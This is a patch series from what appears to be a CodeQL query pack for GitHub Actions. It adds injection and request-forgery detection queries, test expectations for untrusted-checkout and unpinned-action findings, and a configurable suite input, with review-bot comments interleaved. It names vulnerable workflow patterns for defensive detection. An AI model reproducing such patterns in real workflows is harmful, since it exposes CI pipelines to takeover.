from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 
'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:18:7:22:4 | Uses Step | Uses Step | -| .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Unpinned 3rd party Action 'untrusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/untrusted_checkout.yml:22:7:25:21 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index a6f02e7752a..cf9d6c01d49 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
@@ -1,10 +1,10 @@ | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:17:9:23:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:31:9:37:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:46:9:50:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:50:9:53:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
| | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | @@ -18,4 +18,5 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:9:7:13:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5130135df0a87da6f23eba4b81b11383b254b19a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:14:55 +0100 Subject: [PATCH 0109/1267] fix(stepsExpression): allow steps from a composite action to communicate --- ql/lib/codeql/actions/ast/internal/Ast.qll | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5c6ce37fa92..f45565caed7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -855,7 +855,14 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { override string getFieldName() { result = fieldName } override AstNodeImpl getTarget() { - this.getEnclosingJob() = result.getEnclosingJob() and + ( + this.getEnclosingJob() = result.getEnclosingJob() + or + exists(CompositeActionImpl a | + a.getAChildNode*() = this and + a.getAChildNode*() = result + ) + ) and result.(StepImpl).getId() = stepId } From cfed2d4ce029136bab61eefaaf666c77ecbff8d4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 0110/1267] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 00000000000..2a2225e17b6 --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql 
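Review bot: The new `CompositeActionImpl` disjunct in `StepsExpressionImpl.getTarget()` carries no explanatory comment, and the commit adds no fixture for it (the diffstat lists only `Ast.qll`). Presumably steps of a composite action have no enclosing job, so the job equality alone resolved nothing. If that is the reason, a comment such as `// steps in a composite action have no enclosing job; match them through the shared action instead` would state it. A composite `action.yml` test in which one step reads `steps.<id>.outputs.<field>` from an earlier step would guard against regressions, since queries that follow step outputs depend on these targets resolving.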
@@ -0,0 +1,38 @@
+/**
+ * @name Command built from user-controlled sources
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
new file mode 100644
index 00000000000..3834b0ac0d0
--- /dev/null
+++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
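Review bot: The alert text in the `select` reads "Potential expression injection" although this query reports `command-injection` sinks; the same copied message appears in CriticalCommandInjection.ql, CodeInjection.ql, CriticalCodeInjection.ql and RequestForgery.ql added by this commit. Someone triaging the alerts sees one label for five different sink kinds and cannot tell which remediation applies. Use a message per query, here `"Potential command injection in $@, which may be controlled by an external user."`.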
@@ -0,0 +1,44 @@
+/**
+ * @name Command built from user-controlled sources
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
+where
+ MyFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
new file mode 100644
index 00000000000..7ad0e98bc49
--- /dev/null
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
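Review bot: The header reuses `@id actions/command-injection` and the `@name` of CommandInjection.ql, so the warning-level and the error-level query cannot be told apart by id; CriticalCodeInjection.ql repeats `@id actions/code-injection` in the same way. Query ids are expected to be unique within a pack, and results keyed by id would mix a 5.0 rule with a 9 rule. Suggest `@id actions/critical-command-injection`, plus a `@name` and `@description` that state the extra trigger-event condition this query adds.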
@@ -0,0 +1,40 @@
+/**
+ * @name Code injection
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
new file mode 100644
index 00000000000..5a4bbaca034
--- /dev/null
+++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
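Review bot: `CodeInjectionSink` is defined with `externallyDefinedSink(this, "request-forgery")`, which looks copied from RequestForgery.ql. As written, this query reports request-forgery sinks under CWE-094 and never matches a sink modelled as `code-injection`. CriticalCodeInjection.ql has the same line. The characteristic predicate should read `CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }`.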
@@ -0,0 +1,46 @@
+/**
+ * @name Code injection
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
+where
+ MyFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 33d6260203e..d59cc07cad2 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
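Review bot: The `where` clause that makes a result critical has no comment, and both of its conditions have consequences worth stating. Binding `w` through `getEnclosingWorkflow()` presumably drops sources that sit in a composite action, and `w instanceof ReusableWorkflow` accepts every reusable workflow whatever its caller. CriticalCommandInjection.ql uses the same clause. CodeInjection.ql has no matching exclusion, so each flow selected here is likely reported there as well at warning level. I would document the intent, e.g. `// critical: the workflow is reusable, or it is triggered by the event the source value comes from`, and add the negated condition to the two non-critical queries.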
@@ -20,8 +20,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 00000000000..3675597fcd7 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From a9057a738600f2b01b3bfb8757fc0f7b1ead0cde Mon Sep 17 00:00:00 2001 
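Review bot: RequestForgery.ql is marked `@problem.severity error` and `@security-severity 9.1` for every flow, whereas the command- and code-injection queries in this commit reserve `error` for flows whose source event actually triggers the enclosing workflow. If the same reasoning applies to request forgery, a flow from an event the workflow never runs on is over-rated here. Either add the `w.hasTriggerEvent(...)` condition used by the critical queries, or state in the header comment why this sink kind is always rated critical.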
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:10:35 +0100 Subject: [PATCH 0111/1267] Add `suite` input --- .github/action/src/codeql.ts | 2 +- action.yml | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 48750388e57..4870ca27955 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; diff --git a/action.yml b/action.yml index 61fd380c418..a294e981493 100644 --- a/action.yml +++ b/action.yml @@ -14,6 +14,10 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" + suite: + description: "CodeQL Suite to run" + default: "actions-code-scanning" + runs: using: 'composite' steps: From 678f99b6be23d957b45fd654b9eca9d8d31ada0d Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:14:33 +0000 Subject: [PATCH 0112/1267] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e931e22d3f8..61c4f537ad9 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: "codeql-suites/actions-code-scanning.qls", + suite: `codeql-suites/${core.getInput("suite")}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From a9aba88bc5138ad70b88b7f7d116b048171657bc Mon Sep 17 00:00:00 2001 
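Review bot: `core.getInput("suite")` is interpolated into the suite path without any check, so a value containing `/` or `..` selects a file outside `codeql-suites/`, and an unset input yields `codeql-suites/.qls`. The value is supplied by the calling workflow, which may itself build it from an expression. I would resolve it once and restrict it to a file-name pattern: `const suite = core.getInput("suite") || "actions-code-scanning";` followed by `if (!/^[A-Za-z0-9_-]+$/.test(suite)) throw new Error("invalid suite name");`. The rebuilt `dist/index.js` carries the same line, and `newCodeQL` continues outside the hunk.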
From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 17:21:26 +0100 Subject: [PATCH 0113/1267] Add alternate value --- .github/action/src/codeql.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 4870ca27955..56615fa80ce 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 53209a26b18e2679840fc1ef084bbd984c0bfaf1 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 16:22:34 +0000 Subject: [PATCH 0114/1267] build --- .github/action/dist/index.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 61c4f537ad9..4c98f1d6301 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28607,7 +28607,7 @@ async function newCodeQL() { language: "yaml", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", - suite: `codeql-suites/${core.getInput("suite")}.qls`, + suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), }; From 70dd7fe18fa7e58d3d89def920a39120b621c07d Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 0115/1267] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6..9891f786f7c 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d0..5d418ec1816 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 
@@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc49..bc2dbffdcdf 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034..2a1e4388d24 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 
@@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd7..d665a368991 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 1e64b18212fcc69a7d829bf3ae68d84045b9639f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 19:09:22 +0100 Subject: [PATCH 0116/1267] Add suite that runs all queries --- ql/src/codeql-suites/actions-all.qls | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 ql/src/codeql-suites/actions-all.qls diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls new file mode 100644 index 00000000000..2439b95a8e5 --- /dev/null +++ b/ql/src/codeql-suites/actions-all.qls 
@@ -0,0 +1,2 @@ +- description: Standard Code Scanning queries for Actions +- queries: . \ No newline at end of file From d26ead7c3bfd9a609165f70791127538aea1f486 Mon Sep 17 00:00:00 2001 
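Review bot: The `description` says "Standard Code Scanning queries for Actions", but `queries: .` with no filter selects every query in the pack, which would include both the warning and the critical variant of each injection query. A user picking this suite through the new `suite` input should be able to tell it apart from `actions-code-scanning`; suggest `- description: All queries for Actions`.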
From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 0117/1267] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ 